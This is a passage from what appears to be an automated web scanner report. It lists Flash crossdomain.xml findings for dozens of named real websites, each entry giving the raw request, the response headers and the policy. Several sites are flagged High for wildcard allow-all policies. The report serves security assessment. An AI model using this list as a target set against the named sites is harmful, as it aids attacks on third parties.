Host: www.watfordoutlet.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:38:36 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sat, 12 Sep 2009 14:58:49 GMT
Accept-Ranges: bytes
Content-Length: 347
Content-Type: application/xml
Age: 0
Server: YTS/1.19.8

<?xml version="1.0" encoding="iso-8859-1"?>

<cross-domain-policy>
<allow-access-from domain="*.watfordoutlet.com" />
<allow-access-from domain="*.heavygames.com" />
<allow-access-from domain="*.kickingames.com" />
<allow-access-from domain="*.totallyflashgames.com" />
<allow-access-from domain="*" />
...[SNIP]...

6.129. http://www.weallwantsomeone.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weallwantsomeone.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weallwantsomeone.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:59:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.130. http://www.weddingdecor.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weddingdecor.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weddingdecor.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:23:58 GMT
Server: Microsoft-IIS/6.0
Content-Length: 170
Content-Type: text/xml
Content-Location: http://www.weddingdecor.com/crossdomain.xml
Last-Modified: Tue, 12 Aug 2008 05:10:25 GMT
Accept-Ranges: bytes
ETag: "e3bcedba39fcc81:1e69"
Connection: close

<?xml version="1.0" encoding="utf-8"?>

<cross-domain-policy>
<allow-access-from domain="*"/>

</cross-domain-policy>

6.131. http://www.werelate.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.werelate.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.werelate.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:24 GMT
Server: Apache/2.2.4 (Fedora)
Last-Modified: Sat, 12 Jul 2008 16:28:25 GMT
ETag: "48243-c8-25bf7c40"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.132. http://www.wlns.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wlns.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wlns.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:a0e"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 01:48:32 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:48:32 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

6.133. http://www.wmji.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wmji.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wmji.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189142375
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:56:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:56:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.134. http://www.xpmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xpmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xpmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.17 (Unix) PHP/5.2.9 mod_ssl/2.2.17 OpenSSL/0.9.7l mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub
Last-Modified: Thu, 29 Jul 2010 04:21:46 GMT
ETag: "34275ca-c2-48c7f1280aa80"
Accept-Ranges: bytes
Content-Length: 194
MS-Author-Via: DAV
Content-Type: application/xml
Date: Wed, 04 May 2011 02:17:51 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.135. http://www.yorkpress.co.uk/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yorkpress.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yorkpress.co.uk

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (EL)
X-Powered-By: PHP/5.2.6
Cache-Control: private, max-age=0, must-revalidate
ETag: "921a833a1c6fdcf67bcef5abdf389b0e"
Last-Modified: Wed, 04 May 2011 02:47:07 +0100
Set-Cookie: nqdm=80b52e5d53084dbd727b8074d27b54c2; expires=Tue, 19 Jan 2038 03:14:07 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 264
Date: Wed, 04 May 2011 01:47:07 GMT
X-Varnish: 1358719360
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...

6.136. http://www.yougamers.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yougamers.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.yougamers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:11:25 GMT
Server: Apache/2.2.3 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=f76d144a17ee4ba556d110b1a373b8c6; path=/
Last-Modified: Tue, 03 May 2011 22:38:06 +0000
ETag: "1304462286"
Content-Length: 200
Connection: close
Content-Type: text/html

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.137. http://www.youtongue.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.youtongue.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtongue.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:23 GMT
Server: Apache/1.3.41 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8c
Last-Modified: Tue, 06 Apr 2010 15:41:33 GMT
ETag: "11317b-cd-4bbb562d"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.138. http://www.zdf.de/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zdf.de
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdf.de

Response

HTTP/1.1 200 OK
Content-Length: 1112
Content-Type: application/xml
Accept-Ranges: bytes
Server: Apache/2
X-Cache: MISS from www.zdf.de
Date: Wed, 04 May 2011 01:18:17 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*"/> <allow-access-from domain="www.heute.t-online.de"/> <allow-access-from domain="heute.t-online.de"/>
...[SNIP]...
<allow-access-from domain="*.heute.de"/>
...[SNIP]...
<allow-access-from domain="*.zdf.de"/>
...[SNIP]...
<allow-access-from domain="*.tivi.de"/> <allow-access-from domain="cmsorange.zdf.de"/> <allow-access-from domain="zdf.ivwbox.de"/> <allow-access-from domain="2df.ivwbox.de"/> <allow-access-from domain="zdfsup.ivwbox.de"/> <allow-access-from domain="heute.ivwbox.de"/> <allow-access-from domain="sportzdf.ivwbox.de"/> <allow-access-from domain="*.ivwbox.de"/> <allow-access-from domain="peking.zdf.de"/> <allow-access-from domain="*.nacamar.net"/> <allow-access-from domain="test1.syzygy.de"/> <allow-access-from domain="zdf.3m5-extra.net"/> <allow-access-from domain="*.gmodules.com"/>
...[SNIP]...

6.139. http://www.adam4cams.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adam4cams.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adam4cams.com

Response

HTTP/1.1 200 OK
Server: unknown
Date: Wed, 04 May 2011 01:19:42 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Thu, 10 Jun 2010 14:24:45 GMT
Accept-Ranges: bytes
Content-Length: 936
Vary: Accept-Encoding

<cross-domain-policy>
<allow-access-from domain="*.mycams.com" />
<allow-access-from domain="*.mycamsdevel.com" />
<allow-access-from domain="*.awempire.com"/>
<allow-access-from domain="*.jasmin.com"/>
<allow-access-from domain="*.lsl.com"/>
<allow-access-from domain="*.livesexbar.com"/>
<allow-access-from domain="*.hothouselive.com"/>
<allow-access-from domain="*.adam4cams.com"/>
<allow-access-from domain="*.janacam.com"/>
<allow-access-from domain="*.cfnmcamgirls.com"/>
<allow-access-from domain="*.manhuntlive.com"/>
<allow-access-from domain="*.redcherrylive.net"/>
<allow-access-from domain="*.homoemolive.com"/>
<allow-access-from domain="*.livejasmin.com"/>
<allow-access-from domain="*.livegymboys.com"/>
<allow-access-from domain="*.hardcamtube.com"/>
<allow-access-from domain="*.streamgfs.com"/>
<allow-access-from domain="*.jmg"/>
...[SNIP]...

6.140. http://www.adtotal.pl/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adtotal.pl
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.adtotal.pl

Response

HTTP/1.0 200 OK
Server: aris
Content-Type: text/xml
Set-Cookie: statid=173.193.214.243.3917:1304472543:364986198:v1; path=/; expires=Sat, 03-May-14 01:29:03 GMT
Set-Cookie: statid=173.193.214.243.3917:1304472543:364986198:v1; domain=.wp.pl; path=/; expires=Sat, 03-May-14 01:29:03 GMT
Content-Length: 363
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.wp.pl"/>
   <allow-access-from domain="*.wp-sa.pl"/>
   <allow-access-from domain="*.wp.tv"/>
   <allow-access-from domain="wp.tv"/>
   <allow-access-from domain="wpmobi.pl"/>
   <allow-access-from domain="odkrywcy.pl"/>
   <allow-access-from domain="przymierzalnia.tanio.pl"/>
...[SNIP]...

6.141. http://www.allaccess.com.ph/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.allaccess.com.ph
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.allaccess.com.ph

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:21:41 GMT
Server: Apache/2.2.4 (Unix) PHP/4.4.7
Last-Modified: Fri, 02 Oct 2009 04:17:20 GMT
ETag: "624068-107-474ec0a415400"
Accept-Ranges: bytes
Content-Length: 263
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.allaccess.com.ph" />
<allow-access-from domain="gmanews.tv" />
...[SNIP]...

6.142. http://www.artistrising.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.artistrising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.artistrising.com

Response

HTTP/1.1 200 OK
Age: 1
Date: Wed, 04 May 2011 02:30:08 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Content-Length: 642
Content-Type: text/xml
Content-Location: http://www.artistrising.com/crossdomain.xml
Last-Modified: Fri, 10 Jul 2009 05:21:30 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*.allposters.com"/>
   <allow-access-from domain="*.allposters.co.uk"/>
   <allow-access-from domain="*.art.com"/>
   <allow-access-from domain="*.art.co.uk"/>
   <allow-access-from domain="*.artistrising.com"/>
...[SNIP]...

6.143. http://www.bikerplanet.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bikerplanet.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bikerplanet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:44:33 GMT
Server: Apache
Last-Modified: Wed, 01 Dec 2010 15:24:09 GMT
Accept-Ranges: bytes
Content-Length: 270
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.userplane.com" />
...[SNIP]...

6.144. http://www.bmwmotorcycles.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bmwmotorcycles.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bmwmotorcycles.com

Response

HTTP/1.0 200 OK
Server: BMW Webservice
Last-Modified: Wed, 09 Dec 2009 11:55:04 GMT
ETag: "10f2de6-8a5-47a4a5c723600"
Content-Type: application/xml
Date: Wed, 04 May 2011 00:47:28 GMT
Content-Length: 2213
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 01:47:28 GMT

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.bmw-motorrad.com" />
   
   <allow-access-from domain="*.bmw-motorrad.at" />
   <allow-access-from domain="*.bmw-motorrad.be" />
   <allow-access-from domain="*.bmw-motorrad.bg" />
   <allow-access-from domain="*.bmw-motorrad.ch" />
   <allow-access-from domain="*.bmw-motorrad.cz" />
   <allow-access-from domain="*.bmw-motorrad.de" />
   <allow-access-from domain="*.bmw-motorrad.dk" />
   <allow-access-from domain="*.bmw-motorrad.es" />
   <allow-access-from domain="*.bmw-motorrad.fi" />
   <allow-access-from domain="*.bmw-motorrad.fr" />
   <allow-access-from domain="*.bmw-motorrad.gr" />
   <allow-access-from domain="*.bmw-motorrad.ie" />
   <allow-access-from domain="*.bmw-motorrad.it" />
   <allow-access-from domain="*.bmw-motorrad.lu" />
   <allow-access-from domain="*.bmw-motorrad.nl" />
   <allow-access-from domain="*.bmw-motorrad.no" />
   <allow-access-from domain="*.bmw-motorrad.pt" />
   <allow-access-from domain="*.bmw-motorrad.ro" />
   <allow-access-from domain="*.bmw-motorrad.rs" />
   <allow-access-from domain="*.bmw-motorrad.ru" />
   <allow-access-from domain="*.bmw-motorrad.se" />
   <allow-access-from domain="*.bmw-motorrad.si" />
   <allow-access-from domain="*.bmw-motorrad.sk" />
   <allow-access-from domain="*.bmw-motorrad.com.ua" />
   <allow-access-from domain="*.bmw-motorrad.co.uk" />
...[SNIP]...
<allow-access-from domain="*.bmw-motorrad.com.ar" />
   <allow-access-from domain="*.bmw-motorrad.com.br" />
   <allow-access-from domain="*.bmw-motorrad.com.co" />
   <allow-access-from domain="*.bmw-motorrad.com.ec" />
   <allow-access-from domain="*.bmw-motorrad.com.gt" />
   <allow-access-from domain="*.bmw-motorrad.com.mx" />
   <allow-access-from domain="*.bmw-motorrad.com.pa" />
   <allow-access-from domain="*.bmw-motorrad.com.sv" />
   <allow-access-from domain="*.bmw-motorrad.com.ve" />
   <allow-access-from domain="*.bmw-motorrad.co.ve" />
   <allow-access-from domain="*.bmw-motorrad.cl" />
   <allow-access-from domain="*.bmwmotorcycles.com" />
...[SNIP]...
<allow-access-from domain="*.bmwgroup.com" />
   <allow-access-from domain="www8i.muc:5251" />
   <allow-access-from domain="www8i.muc:5258" />
...[SNIP]...

6.145. http://www.bookfresh.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bookfresh.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bookfresh.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 25 Mar 2010 23:26:50 GMT
ETag: "176089e-122-61934280"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bookfresh.com" />
<allow-access-from domain="images.bookfresh.com.s3.amazonaws.com" />
...[SNIP]...

6.146. http://www.brockport.edu/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.brockport.edu
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.brockport.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:29:30 GMT
Server: Apache
Last-Modified: Mon, 18 Apr 2011 15:32:13 GMT
ETag: "634a0c-d7-4a133187b9940"
Accept-Ranges: bytes
Content-Length: 215
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.brockport.edu" />
</cross-d
...[SNIP]...

6.147. http://www.bullionvault.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bullionvault.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bullionvault.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C3CB6E219641133CED3AC412FB3DDC21; Path=/
Accept-Ranges: bytes
ETag: W/"448-1301569156000"
Last-Modified: Thu, 31 Mar 2011 10:59:16 GMT
Content-Type: application/xml
Content-Length: 448
Date: Wed, 04 May 2011 03:45:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*.telegraph.co.uk" />
...[SNIP]...
<allow-access-from domain="static.bullionvault.com" />
<allow-access-from domain="live.bullionvault.com" />
...[SNIP]...

6.148. http://www.camscape.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.camscape.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.camscape.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:40:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 16 Feb 2008 01:32:27 GMT
ETag: "1d306a5-141-4463c7ed960c0"
Accept-Ranges: bytes
Content-Length: 321
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.camstreams.com" />
<allow-access-from domain="*.patsflat.com" />
<allow-access-from domain="*.camscape.com" />
...[SNIP]...

6.149. http://www.cashfiesta.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cashfiesta.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cashfiesta.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:56 GMT
Server: Apache
Last-Modified: Wed, 20 Oct 2010 11:21:21 GMT
ETag: "10801e8-e9-4930a9be0ce40"
Accept-Ranges: bytes
Content-Length: 233
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cashfiesta.com" secure="false"/>
...[SNIP]...

6.150. http://www.columbuslocalnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.columbuslocalnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.columbuslocalnews.com

Response

HTTP/1.0 200 OK
Server: WWW
Content-Type: application/xml
Date: Wed, 04 May 2011 01:49:01 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
ETag: "1593037"
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
Last-Modified: Fri, 09 Jan 2009 22:40:41 GMT
X-Cache-Info: caching
Real-Hostname: columbuslocalnews.com
Content-Length: 127

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.mytiwi.com" to-ports="*" />
</cross-domain-policy>

6.151. http://www.contentedits.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.contentedits.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contentedits.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:50:56 GMT
Content-Length: 414
Content-Type: text/xml
Last-Modified: Thu, 30 Apr 2009 19:52:40 GMT
Accept-Ranges: bytes
ETag: "d4973a38cdc9c91:2cca7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>

<cross-domain-policy>

   <allow-access-from domain="*.infomedia.net"/>
   <allow-access-from domain="infomedia.com"/>
   <allow-access-from domain="www.infomedia.com"/>
...[SNIP]...
<allow-access-from domain="threemommas.com"/>
   <allow-access-from domain="www.threemommas.com"/>
...[SNIP]...

6.152. http://www.cybermonday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cybermonday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cybermonday.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:52:55 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304477575754491; path=/; expires=Thu, 03-May-12 02:52:55 GMT
Last-Modified: Tue, 26 Apr 2011 19:57:14 GMT
ETag: "709a2-f6-4a1d7bafc9a80"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.chase.com"/>
<allow-http-request-headers-from domain="*.ch
...[SNIP]...

6.153. http://www.dailyadvance.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dailyadvance.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailyadvance.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:44:44 GMT
Content-Type: application/rss+xml; charset=utf-8
Connection: close
Content-Length: 359
Last-Modified: Wed, 04 May 2011 01:26:50 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.dailyadvance.com" />
<allow-access-from domain="*.www.dailyadvance.com" />
...[SNIP]...

6.154. http://www.dana.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dana.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dana.org

Response

HTTP/1.1 200 OK
Content-Length: 261
Content-Type: text/xml
Last-Modified: Wed, 15 Oct 2008 14:51:34 GMT
Accept-Ranges: bytes
ETag: "b4deb184d52ec91:349"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:23:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.dana.org" />
<allow-access-from domain="*.n4m.net" />
...[SNIP]...

6.155. http://www.deathpenaltyinfo.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.deathpenaltyinfo.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deathpenaltyinfo.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:09:53 GMT
Server: Apache/2.2.14
Set-Cookie: SESS264c8d63753285e01f38f546fd450a23=2aedf043179e82e2a60521d5a2b698a9; expires=Fri, 27-May-2011 07:43:13 GMT; path=/; domain=.deathpenaltyinfo.org
Set-Cookie: mt_redirect=true; expires=Fri, 03-Jun-2011 04:09:53 GMT; path=/
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 04 May 2011 04:09:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Length: 401
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.deathpenaltyinfo.org" />
...[SNIP]...
<allow-access-from domain="*.www.deathpenaltyinfo.org" />
...[SNIP]...
<allow-access-from domain="*.www.deathpenaltyinfo.org" />
...[SNIP]...

6.156. http://www.dundermifflininfinity.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dundermifflininfinity.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dundermifflininfinity.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Last-Modified: Fri, 13 Feb 2009 23:24:13 GMT
ETag: "6140294-1aa-462d5227cc140"
Accept-Ranges: bytes
Content-Length: 426
Wirt: (null)
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 03:26:18 GMT
Date: Wed, 04 May 2011 03:21:18 GMT
Connection: close

<?xml version="1.0"?>
